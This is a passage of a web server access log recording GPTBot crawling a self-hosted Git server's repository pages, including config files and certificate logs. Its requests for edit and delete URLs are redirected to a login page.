"https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=name&state=open" [Client 74.7.227.38] [Length 8465] [Gzip 2.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=name&state=closed" -[17/Feb/2026:16:30:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39468] [Gzip 31.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:16:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:16:30:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:30:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9994] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:16:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:30:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 2430] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 1442] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:30:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 10072] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 9850] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 9850] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12773] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 15347] [Gzip 8.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 36058] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 9849] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 33675] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 33860] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 13064] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12752] [Gzip 7.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 23957] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38986] [Gzip 6.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:30:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:30:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:30:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:30:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:30:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:30:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:30:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:30:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:30:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:30:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:30:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:30:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:30:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:30:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 